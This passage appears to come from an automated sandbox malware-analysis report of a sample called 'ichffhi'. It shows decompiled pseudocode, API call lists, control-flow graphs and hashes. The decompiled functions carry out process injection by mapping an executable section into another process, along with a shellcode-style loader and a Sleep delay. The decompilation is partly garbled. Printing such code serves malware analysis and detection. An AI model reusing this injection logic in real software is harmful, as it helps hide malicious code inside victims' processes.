										_t163 = _t162 + 0x108;
									}
									_push(_t139);
									_t140 =  *(_t163 + 0x10);
									if(_t140 != 0) {
										memcpy( *((intOrPtr*)(_t163 + 0xc)) +  *(_t200 - 0x48),  *((intOrPtr*)(_t163 + 0x14)) +  *((intOrPtr*)(_t200 + 0xc)), _t140);
									}
									asm("loop 0xffffffe6");
									_pop(_t192);
									if( *((intOrPtr*)(_t200 - 0x34)) == 0) {
										_push(_t192);
										_t166 =  *((intOrPtr*)(_t192 + 0x34)) -  *(_t200 - 0x40);
										_t195 =  *((intOrPtr*)(_t192 + 0xa0)) +  *(_t200 - 0x48);
										__eflags = _t195;
										while(1) {
											__eflags =  *_t195;
											if( *_t195 == 0) {
												break;
											}
											_t176 =  *_t195;
											_t195 = _t195 + 8;
											asm("lodsw");
											__eflags = 0;
											if(0 != 0) {
												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t166;
												__eflags =  *((intOrPtr*)(0 +  *(_t200 - 0x48) + _t176));
											}
											asm("loop 0xffffffe9");
										}
										_pop(_t196);
										_t174 = 0;
										__eflags = 0;
										_t109 = _t200 - 4;
										 *_t109 = 0;
										 *((intOrPtr*)(_t127 + 0x98))( *(_t200 - 0xc), 0, 0, 0, 0, 0,  *((intOrPtr*)(_t196 + 0x28)) +  *(_t200 - 0x40),  *(_t200 - 0x3c), _t109, 0);
									} else {
										L50();
										_pop(_t177);
										_t174 = _t177 - 0x16ee;
										 *((intOrPtr*)(_t174 + 0x1722)) = _t174 + 0x2bbb;
										L004011C3();
										0x33(_t174 + 0x2bbb, 0x1ad);
										 *((intOrPtr*)(_t174 + 0x1747)) = _t174 + 0x2c0b;
										0x33();
									}
								}
							}
						}
					}
				}
				_t92 = 0x1474;
				_push(0x379);
			}








































                    0x00401460
                    0x00401460
                    0x0040146f
                    0x00401474
                    0x00401477
                    0x00401479
                    0x00401482
                    0x00401484
                    0x00401484
                    0x00401487
                    0x00401487
                    0x0040148c
                    0x00000000
                    0x00000000
                    0x004017b7
                    0x004017b7
                    0x00401492
                    0x00401495
                    0x00401498
                    0x0040149c
                    0x0040149f
                    0x004014a3
                    0x004014a9
                    0x004014ac
                    0x004014ae
                    0x004014b1
                    0x004014b7
                    0x004014ba
                    0x004014c8
                    0x004014c9
                    0x004014ca
                    0x004014cc
                    0x004014d2
                    0x004014f5
                    0x004014f8
                    0x004014fb
                    0x004014fe
                    0x00401504
                    0x00401519
                    0x0040151e
                    0x00401521
                    0x00401524
                    0x0040153c
                    0x0040153e
                    0x00401541
                    0x0040155a
                    0x0040155c
                    0x00401566
                    0x0040156c
                    0x00401572
                    0x00401572
                    0x0040155a
                    0x0040153c
                    0x00401575
                    0x00401581
                    0x00401584
                    0x00401586
                    0x0040159b
                    0x004015ae
                    0x004015b1
                    0x004015b4
                    0x004015cc
                    0x004015d2
                    0x004015d5
                    0x004015ec
                    0x004015ee
                    0x004015f4
                    0x004015f9
                    0x004015fd
                    0x004015fe
                    0x004015fe
                    0x00401603
                    0x00401628
                    0x00401630
                    0x00401642
                    0x00401647
                    0x00401659
                    0x0040167e
                    0x0040168b
                    0x004016a9
                    0x004016ab
                    0x004016af
                    0x004016b0
                    0x004016b6
                    0x004016c0
                    0x004016c0
                    0x004016b8
                    0x004016b8
                    0x004016b8
                    0x004016c6
                    0x004016c7
                    0x004016cc
                    0x004016da
                    0x004016da
                    0x004016e0
                    0x004016e2
                    0x004016e7
                    0x0040174f
                    0x00401753
                    0x0040175e
                    0x0040175e
                    0x00401761
                    0x00401761
                    0x00401764
                    0x00000000
                    0x00000000
                    0x00401766
                    0x00401770
                    0x00401775
                    0x00401777
                    0x0040177c
                    0x00401788
                    0x00401788
                    0x00401788
                    0x0040178a
                    0x0040178a
                    0x0040178e
                    0x00401795
                    0x00401795
                    0x00401797
                    0x0040179a
                    0x004017aa
                    0x004016e9
                    0x004016e9
                    0x004016ee
                    0x004016ef
                    0x00401705
                    0x00401714
                    0x00401721
                    0x00401738
                    0x00401746
                    0x00401746
                    0x004016e7
                    0x004015ee
                    0x004015cc
                    0x0040159b
                    0x004014d2
                    0x004017cb
                    0x004017db

                    APIs
                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004014E7
                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401514
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401537
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401555
                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401596
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015C7
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004015E9
                    Memory Dump Source
                    • Source File: 00000002.00000002.430871790.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_ichffhi.jbxd
                    Similarity
                    • API ID: Section$View$Create$DuplicateObject
                    • String ID:
                    • API String ID: 1546783058-0
                    • Opcode ID: 6009193819dd22e85f5db9aefac48bd8857ccca130184f1ff84ad04c18ecb97b
                    • Instruction ID: 0eb640bdefb12f4d8d79d21e94fd48f192c5c8138051fc39ed52ff1756291963
                    • Opcode Fuzzy Hash: 6009193819dd22e85f5db9aefac48bd8857ccca130184f1ff84ad04c18ecb97b
                    • Instruction Fuzzy Hash: 5D511A75900249BFEF208F91CC89FEF7BB8EF85710F104159FA11AA2A5D7709944CB24
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040146B Relevance: 10.7, APIs: 7, Instructions: 163nativeCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 237 40146b-401482 call 401134 243 401484 237->243 244 401487-40148c 237->244 243->244 246 4017b2-4017ba 244->246 247 401492-4014a3 244->247 246->244 250 4017b0-4017d3 247->250 251 4014a9-4014d2 247->251 259 4017e5 250->259 251->250 258 4014d8-4014ef NtDuplicateObject 251->258 258->250 260 4014f5-401519 NtCreateSection 258->260 262 401575-40159b NtCreateSection 260->262 263 40151b-40153c NtMapViewOfSection 260->263 262->250 267 4015a1-4015a5 262->267 263->262 265 40153e-40155a NtMapViewOfSection 263->265 265->262 268 40155c-401572 265->268 267->250 269 4015ab-4015cc NtMapViewOfSection 267->269 268->262 269->250 270 4015d2-4015ee NtMapViewOfSection 269->270 270->250 272 4015f4 call 4015f9 270->272
                    C-Code - Quality: 57%
                    			E0040146B(void* __edi, void* __eflags) {
				void* _t84;
				intOrPtr _t87;
				long _t90;
				void* _t91;
				struct _GUID _t98;
				struct _GUID _t100;
				PVOID* _t102;
				PVOID* _t104;
				intOrPtr* _t108;
				PVOID* _t120;
				PVOID* _t122;
				intOrPtr _t126;
				long* _t130;
				signed int _t137;
				int _t138;
				intOrPtr _t155;
				void* _t160;
				intOrPtr* _t161;
				void* _t164;
				long _t172;
				intOrPtr _t174;
				void* _t175;
				long* _t180;
				intOrPtr* _t182;
				HANDLE* _t183;
				HANDLE* _t184;
				void* _t189;
				void* _t190;
				intOrPtr* _t193;
				void* _t194;
				void* _t197;
				void* _t198;
				void* _t200;
				void* _t202;
				intOrPtr* _t203;
				long _t221;
				void* _t227;

				asm("pushfd");
				E00401134(_t84, __edi, __eflags, _t227);
				_t126 =  *((intOrPtr*)(_t198 + 8));
				_t172 = 0;
				 *((intOrPtr*)(_t198 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t198 - 0x34)) =  *((intOrPtr*)(_t198 - 0x34)) + 1;
				}
				while(1) {
					_t87 =  *((intOrPtr*)(_t126 + 0x48))();
					if(_t87 != 0) {
						break;
					}
					 *((intOrPtr*)(_t126 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t198 - 0x5c)) = _t87;
				_t180 = _t198 - 0x60;
				 *_t180 = _t172;
				 *((intOrPtr*)(_t126 + 0x4c))(_t87, _t180);
				_t90 =  *_t180;
				if(_t90 != 0) {
					_t130 = _t198 - 0x30;
					 *_t130 = _t90;
					_t130[1] = _t172;
					_t182 = _t198 - 0x28;
					 *((intOrPtr*)(_t126 + 0x10))(_t182, 0x18);
					 *_t182 = 0x18;
					_push(_t198 - 0x30);
					_push(_t182);
					_push(0x40);
					_push(_t198 - 0x10);
					if( *((intOrPtr*)(_t126 + 0x70))() == 0 && NtDuplicateObject( *(_t198 - 0x10), 0xffffffff, 0xffffffff, _t198 - 0xc, _t172, _t172, 2) == 0) {
						 *(_t198 - 8) = _t172;
						_t98 = _t198 - 0x50;
						 *(_t98 + 4) = _t172;
						 *_t98 = 0x5000;
						_t183 = _t198 - 0x54;
						if(NtCreateSection(_t183, 6, _t172, _t98, 4, 0x8000000, _t172) == 0) {
							 *_t25 =  *(_t198 - 0x50);
							_t120 = _t198 - 0x44;
							 *_t120 = _t172;
							if(NtMapViewOfSection( *_t183, 0xffffffff, _t120, _t172, _t172, _t172, _t198 - 0x38, 1, _t172, 4) == 0) {
								_t122 = _t198 - 0x3c;
								 *_t122 = _t172;
								if(NtMapViewOfSection( *_t183,  *(_t198 - 0xc), _t122, _t172, _t172, _t172, _t198 - 0x38, 1, _t172, 4) == 0) {
									_t197 =  *(_t198 - 0x44);
									 *((intOrPtr*)(_t126 + 0x20))(_t172, _t197, 0x104);
									 *((intOrPtr*)(_t197 + 0x208)) =  *((intOrPtr*)(_t198 + 0x14));
									 *(_t198 - 8) =  *(_t198 - 8) + 1;
								}
							}
						}
						_t100 = _t198 - 0x50;
						 *(_t100 + 4) = _t172;
						 *_t100 =  *((intOrPtr*)(_t198 + 0x10)) + 0x10000;
						_t184 = _t198 - 0x58;
						if(NtCreateSection(_t184, 0xe, _t172, _t100, 0x40, 0x8000000, _t172) == 0 &&  *(_t198 - 8) != 0) {
							 *_t46 =  *(_t198 - 0x50);
							_t102 = _t198 - 0x48;
							 *_t102 = _t172;
							if(NtMapViewOfSection( *_t184, 0xffffffff, _t102, _t172, _t172, _t172, _t198 - 0x38, 1, _t172, 4) == 0) {
								_t104 = _t198 - 0x40;
								 *_t104 = _t172;
								_t221 = NtMapViewOfSection( *_t184,  *(_t198 - 0xc), _t104, _t172, _t172, _t172, _t198 - 0x38, 1, _t172, 0x20);
								if(_t221 == 0) {
									L18();
									if(_t221 == 0 && _t221 != 0) {
										asm("xlatb");
										asm("rcl dword [ebx], 0x8b");
									}
									_t202 = _t200 + 4;
									_push(0x2eb0);
									_t203 = _t202 + 4;
									_push(0x2260);
									_t155 =  *_t203;
									_push(_t155);
									asm("lodsb");
									asm("loop 0xffffffc9");
									_t189 =  *((intOrPtr*)(_t198 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t198 + 0xc))));
									_t137 =  *(_t189 + 6) & 0x0000ffff;
									_push(_t189);
									_t160 = _t189;
									if( *((intOrPtr*)(_t198 - 0x34)) == 0) {
										_t161 = _t160 + 0xf8;
										__eflags = _t161;
									} else {
										_t161 = _t160 + 0x108;
									}
									_push(_t137);
									_t138 =  *(_t161 + 0x10);
									if(_t138 != 0) {
										memcpy( *((intOrPtr*)(_t161 + 0xc)) +  *(_t198 - 0x48),  *((intOrPtr*)(_t161 + 0x14)) +  *((intOrPtr*)(_t198 + 0xc)), _t138);
									}
									asm("loop 0xffffffe6");
									_pop(_t190);
									if( *((intOrPtr*)(_t198 - 0x34)) == 0) {
										_push(_t190);
										_t164 =  *((intOrPtr*)(_t190 + 0x34)) -  *(_t198 - 0x40);
										_t193 =  *((intOrPtr*)(_t190 + 0xa0)) +  *(_t198 - 0x48);
										__eflags = _t193;
										while(1) {
											__eflags =  *_t193;
											if( *_t193 == 0) {
												break;
											}
											_t174 =  *_t193;
											_t193 = _t193 + 8;
											asm("lodsw");
											__eflags = 0;
											if(0 != 0) {
												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t164;
												__eflags =  *((intOrPtr*)(0 +  *(_t198 - 0x48) + _t174));
											}
											asm("loop 0xffffffe9");
										}
										_pop(_t194);
										_t172 = 0;
										__eflags = 0;
										_t108 = _t198 - 4;
										 *_t108 = 0;
										 *((intOrPtr*)(_t126 + 0x98))( *(_t198 - 0xc), 0, 0, 0, 0, 0,  *((intOrPtr*)(_t194 + 0x28)) +  *(_t198 - 0x40),  *(_t198 - 0x3c), _t108, 0);
									} else {
										L51();
										_pop(_t175);
										_t172 = _t175 - 0x16ee;
										 *((intOrPtr*)(_t172 + 0x1722)) = _t172 + 0x2bbb;
										L004011C3();
										0x33(_t172 + 0x2bbb, 0x1ad);
										 *((intOrPtr*)(_t172 + 0x1747)) = _t172 + 0x2c0b;
										0x33();
									}
								}
							}
						}
					}
				}
				_t91 = 0x1474;
				_push(0x379);
			}








































                    0x0040146b
                    0x0040146f
                    0x00401474
                    0x00401477
                    0x00401479
                    0x00401482
                    0x00401484
                    0x00401484
                    0x00401487
                    0x00401487
                    0x0040148c
                    0x00000000
                    0x00000000
                    0x004017b7
                    0x004017b7
                    0x00401492
                    0x00401495
                    0x00401498
                    0x0040149c
                    0x0040149f
                    0x004014a3
                    0x004014a9
                    0x004014ac
                    0x004014ae
                    0x004014b1
                    0x004014b7
                    0x004014ba
                    0x004014c8
                    0x004014c9
                    0x004014ca
                    0x004014cc
                    0x004014d2
                    0x004014f5
                    0x004014f8
                    0x004014fb
                    0x004014fe
                    0x00401504
                    0x00401519
                    0x0040151e
                    0x00401521
                    0x00401524
                    0x0040153c
                    0x0040153e
                    0x00401541
                    0x0040155a
                    0x0040155c
                    0x00401566
                    0x0040156c
                    0x00401572
                    0x00401572
                    0x0040155a
                    0x0040153c
                    0x00401575
                    0x00401581
                    0x00401584
                    0x00401586
                    0x0040159b
                    0x004015ae
                    0x004015b1
                    0x004015b4
                    0x004015cc
                    0x004015d2
                    0x004015d5
                    0x004015ec
                    0x004015ee
                    0x004015f4
                    0x004015f9
                    0x004015fd
                    0x004015fe
                    0x004015fe
                    0x00401603
                    0x00401628
                    0x00401630
                    0x00401642
                    0x00401647
                    0x00401659
                    0x0040167e
                    0x0040168b
                    0x004016a9
                    0x004016ab
                    0x004016af
                    0x004016b0
                    0x004016b6
                    0x004016c0
                    0x004016c0
                    0x004016b8
                    0x004016b8
                    0x004016b8
                    0x004016c6
                    0x004016c7
                    0x004016cc
                    0x004016da
                    0x004016da
                    0x004016e0
                    0x004016e2
                    0x004016e7
                    0x0040174f
                    0x00401753
                    0x0040175e
                    0x0040175e
                    0x00401761
                    0x00401761
                    0x00401764
                    0x00000000
                    0x00000000
                    0x00401766
                    0x00401770
                    0x00401775
                    0x00401777
                    0x0040177c
                    0x00401788
                    0x00401788
                    0x00401788
                    0x0040178a
                    0x0040178a
                    0x0040178e
                    0x00401795
                    0x00401795
                    0x00401797
                    0x0040179a
                    0x004017aa
                    0x004016e9
                    0x004016e9
                    0x004016ee
                    0x004016ef
                    0x00401705
                    0x00401714
                    0x00401721
                    0x00401738
                    0x00401746
                    0x00401746
                    0x004016e7
                    0x004015ee
                    0x004015cc
                    0x0040159b
                    0x004014d2
                    0x004017cb
                    0x004017db

                    APIs
                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004014E7
                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401514
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401537
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401555
                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401596
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015C7
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004015E9
                    Memory Dump Source
                    • Source File: 00000002.00000002.430871790.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_ichffhi.jbxd
                    Similarity
                    • API ID: Section$View$Create$DuplicateObject
                    • String ID:
                    • API String ID: 1546783058-0
                    • Opcode ID: 35e92747d0d6b9a951735621b21a4a40d652c97b84ba7f77340fa48fb621f182
                    • Instruction ID: 89e6db08217f17037b3c9ea992626000aec066f246d799dfcc25d33cb0bbcea7
                    • Opcode Fuzzy Hash: 35e92747d0d6b9a951735621b21a4a40d652c97b84ba7f77340fa48fb621f182
                    • Instruction Fuzzy Hash: 0151FAB5900249BFEB208F91CC89FAF7BB8EF85710F104159FA11AA2A5D7749945CB24
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0053003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 0 53003c-530047 1 530049 0->1 2 53004c-530263 call 530a3f call 530e0f call 530d90 VirtualAlloc 0->2 1->2 17 530265-530289 call 530a69 2->17 18 53028b-530292 2->18 23 5302ce-5303c2 VirtualProtect call 530cce call 530ce7 17->23 20 5302a1-5302b0 18->20 22 5302b2-5302cc 20->22 20->23 22->20 29 5303d1-5303e0 23->29 30 5303e2-530437 call 530ce7 29->30 31 530439-5304b8 VirtualFree 29->31 30->29 33 5305f4-5305fe 31->33 34 5304be-5304cd 31->34 37 530604-53060d 33->37 38 53077f-530789 33->38 36 5304d3-5304dd 34->36 36->33 40 5304e3-530505 36->40 37->38 43 530613-530637 37->43 41 5307a6-5307b0 38->41 42 53078b-5307a3 38->42 51 530517-530520 40->51 52 530507-530515 40->52 44 5307b6-5307cb 41->44 45 53086e-5308be LoadLibraryA 41->45 42->41 46 53063e-530648 43->46 48 5307d2-5307d5 44->48 50 5308c7-5308f9 45->50 46->38 49 53064e-53065a 46->49 53 5307d7-5307e0 48->53 54 530824-530833 48->54 49->38 55 530660-53066a 49->55 57 530902-53091d 50->57 58 5308fb-530901 50->58 59 530526-530547 51->59 52->59 60 5307e2 53->60 61 5307e4-530822 53->61 56 530839-53083c 54->56 62 53067a-530689 55->62 56->45 63 53083e-530847 56->63 58->57 66 53054d-530550 59->66 60->54 61->48 64 530750-53077a 62->64 65 53068f-5306b2 62->65 67 53084b-53086c 63->67 68 530849 63->68 64->46 69 5306b4-5306ed 65->69 70 5306ef-5306fc 65->70 72 5305e0-5305ef 66->72 73 530556-53056b 66->73 67->56 68->45 69->70 74 53074b 70->74 75 5306fe-530748 70->75 72->36 76 53056f-53057a 73->76 77 53056d 73->77 74->62 75->74 78 53059b-5305bb 76->78 79 53057c-530599 76->79 77->72 84 5305bd-5305db 78->84 79->84 84->66
                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0053024D
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.431007198.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_530000_ichffhi.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocVirtual
                    • String ID: cess$kernel32.dll
                    • API String ID: 4275171209-1230238691
                    • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                    • Instruction ID: dbbae28743631155f3db6bb32cb2d02d0cd49f0ed6f47c960f984cfc88bdb838
                    • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                    • Instruction Fuzzy Hash: 7C526874A01229DFDB64CF58C995BA8BBB1BF09304F1480D9E90DAB391DB30AE95DF14
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040C96A Relevance: 4.6, APIs: 3, Instructions: 84COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 274 40c96a-40c983 call 4105f7 277 40c985-40c988 274->277 278 40c99d-40c9a1 274->278 281 40ca2d-40ca2f 277->281 279 40c9a3-40c9b8 call 41065a 278->279 280 40c98d-40c98f 278->280 279->277 287 40c9ba-40c9c1 279->287 283 40c991 280->283 284 40c992-40c999 280->284 283->284 284->278 288 40ca05-40ca08 287->288 289 40c9c3-40c9d0 288->289 290 40ca0a-40ca29 288->290 294 40c9d2-40c9d5 call 41065a 289->294 295 40ca03 289->295 293 40ca2b-40ca2c 290->293 293->281 297 40c9da-40c9e0 294->297 295->288 298 40ca30-40ca45 297->298 299 40c9e2-40c9ef 297->299 298->293 302 40ca00 299->302 303 40c9f1-40c9fd 299->303 302->295 303->302
                    APIs
                    • ___initmbctable.LIBCMT ref: 0040C972
                      • Part of subcall function 004105F7: __setmbcp.LIBCMT ref: 00410602
                    • __calloc_crt.LIBCMT ref: 0040C9A7
                    Memory Dump Source
                    • Source File: 00000002.00000002.430892447.0000000000409000.00000020.00000001.01000000.00000006.sdmp, Offset: 00409000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_409000_ichffhi.jbxd
                    Similarity
                    • API ID: ___initmbctable__calloc_crt__setmbcp
                    • String ID:
                    • API String ID: 4150745854-0
                    • Opcode ID: bbed12e89968c4f6c2cbb67d26b3dfc3fbc67c745ac89b501c6bab3494cf33b4
                    • Instruction ID: ba80878632f788adcc880e20e5c52df4f94d7748c8d254a861737b16b4d9621a
                    • Opcode Fuzzy Hash: bbed12e89968c4f6c2cbb67d26b3dfc3fbc67c745ac89b501c6bab3494cf33b4
                    • Instruction Fuzzy Hash: 8B210EB3904111AAEF2197366C85B5737849B41365F35033FF891722D1DA7D9882865D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00530E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 305 530e0f-530e24 SetErrorMode * 2 306 530e26 305->306 307 530e2b-530e2c 305->307 306->307
                    APIs
                    • SetErrorMode.KERNELBASE(00000400,?,?,00530223,?,?), ref: 00530E19
                    • SetErrorMode.KERNELBASE(00000000,?,?,00530223,?,?), ref: 00530E1E
                    Memory Dump Source
                    • Source File: 00000002.00000002.431007198.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_530000_ichffhi.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorMode
                    • String ID:
                    • API String ID: 2340568224-0
                    • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                    • Instruction ID: 744b544679e81edac46ace1a1040a10e47f9b2819e4d35e23ba8ce53e105023a
                    • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                    • Instruction Fuzzy Hash: BDD0123124522877D7003A94DC09BCD7F1CDF05B62F008411FB0DD9080C770994046E5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040CE1F Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 308 40ce1f-40ce41 HeapCreate 309 40ce43-40ce44 308->309 310 40ce45-40ce4e 308->310
                    APIs
                    • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040CE34
                    Memory Dump Source
                    • Source File: 00000002.00000002.430892447.0000000000409000.00000020.00000001.01000000.00000006.sdmp, Offset: 00409000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_409000_ichffhi.jbxd
                    Similarity
                    • API ID: CreateHeap
                    • String ID:
                    • API String ID: 10892065-0
                    • Opcode ID: f58d1642b2d06b1893d901f714456932096660bd81b9c58e6896f47aa16a25e0
                    • Instruction ID: c4e98715908aa5aa5608ab1660a6e083fbb4bcb1d5e1bcca78ae5a112a13d87e
                    • Opcode Fuzzy Hash: f58d1642b2d06b1893d901f714456932096660bd81b9c58e6896f47aa16a25e0
                    • Instruction Fuzzy Hash: C4D0A7366543099FEB105F74BD087233BECD384395F004436B90CC61A0F574C941C648
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004017F4 Relevance: 1.3, APIs: 1, Instructions: 51sleepCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 311 4017f4-401817 315 401825 311->315 316 40181e-401821 311->316 315->316 317 401828-40184a call 401134 Sleep call 401366 315->317 316->317 322 401859-40185f 317->322 323 40184c-401854 call 40143b 317->323 326 401865-40188e call 401134 322->326 327 40186e 322->327 323->322 327->326
                    C-Code - Quality: 43%
                    			E004017F4(void* __edi, void* __esi, void* __eflags, void* __fp0, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* __ebp;
				intOrPtr _t8;
				void* _t11;
				void* _t14;
				intOrPtr* _t16;
				void* _t19;
				intOrPtr* _t23;

				_t27 = __fp0;
				_t25 = __eflags;
				_t20 = __edi;
				_push(__edi);
				_push(0x182d);
				_t8 =  *_t23;
				_push(0x5d);
				E00401134(_t8, __edi, __eflags, __fp0);
				_t16 = _a4;
				Sleep(0x1388);
				_t11 = L00401366(_t19, _t25, _t16, _a8, _a12,  &_v8); // executed
				_t26 = _t11;
				if(_t11 != 0) {
					E0040143B(_t26, _t16, _t11, _v8, _a16); // executed
				}
				 *_t16(0xffffffff, 0);
				_t14 = E00401134(0x182d, _t20, _t26, _t27);
				[far dword [edi+0x5e]();
				return _t14;
			}











                    0x004017f4
                    0x004017f4
                    0x004017f4
                    0x004017fc
                    0x00401805
                    0x0040180a
                    0x0040181e
                    0x00401828
                    0x0040182d
                    0x00401835
                    0x00401843
                    0x00401848
                    0x0040184a
                    0x00401854
                    0x00401854
                    0x0040185d
                    0x00401885
                    0x00401889
                    0x0040188e

                    APIs
                    • Sleep.KERNELBASE(00001388), ref: 00401835
                      • Part of subcall function 0040143B: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004014E7
                      • Part of subcall function 0040143B: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401514
                      • Part of subcall function 0040143B: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401537
                    Memory Dump Source
                    • Source File: 00000002.00000002.430871790.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_ichffhi.jbxd
                    Similarity
                    • API ID: Section$CreateDuplicateObjectSleepView
                    • String ID:
                    • API String ID: 1885482327-0
                    • Opcode ID: 4833809e19ebbce1afda95b8d958c6ac0413f9150f8c520dfd08e6e3e547968f
                    • Instruction ID: df28ea85591e98f8d733e92c0a85c910368ecf21aa371a8bf2e7d42b67981e89
                    • Opcode Fuzzy Hash: 4833809e19ebbce1afda95b8d958c6ac0413f9150f8c520dfd08e6e3e547968f
                    • Instruction Fuzzy Hash: 05014F77608204E7DB017AA59C41EAA366CAB45754F20C537FA13781F1D63CCB12ABAB
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401824 Relevance: 1.3, APIs: 1, Instructions: 39sleepCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 334 401824-401825 336 401828-40184a call 401134 Sleep call 401366 334->336 337 40181e-401821 334->337 342 401859-40185f 336->342 343 40184c-401854 call 40143b 336->343 337->336 346 401865-40188e call 401134 342->346 347 40186e 342->347 343->342 347->346
                    C-Code - Quality: 56%
                    			E00401824(void* __edi, void* __eflags, void* __fp0) {
				void* _t8;
				void* _t11;
				void* _t14;
				intOrPtr* _t16;
				void* _t20;
				void* _t22;

				_t27 = __fp0;
				_t25 = __eflags;
				_t21 = __edi;
				_pop(_t8);
				_t22 = 0x5d;
				E00401134(_t8, __edi, __eflags, __fp0);
				_t16 =  *((intOrPtr*)(_t22 + 8));
				Sleep(0x1388);
				_t11 = L00401366(_t20, _t25, _t16,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
				_t26 = _t11;
				if(_t11 != 0) {
					E0040143B(_t26, _t16, _t11,  *((intOrPtr*)(_t22 - 4)),  *((intOrPtr*)(_t22 + 0x14))); // executed
				}
				 *_t16(0xffffffff, 0);
				_t14 = E00401134(0x182d, _t21, _t26, _t27);
				[far dword [edi+0x5e]();
				return _t14;
			}









                    0x00401824
                    0x00401824
                    0x00401824
                    0x00401824
                    0x0040181f
                    0x00401828
                    0x0040182d
                    0x00401835
                    0x00401843
                    0x00401848
                    0x0040184a
                    0x00401854
                    0x00401854
                    0x0040185d
                    0x00401885
                    0x00401889
                    0x0040188e

                    APIs
                    • Sleep.KERNELBASE(00001388), ref: 00401835
                      • Part of subcall function 0040143B: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004014E7
                      • Part of subcall function 0040143B: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401514
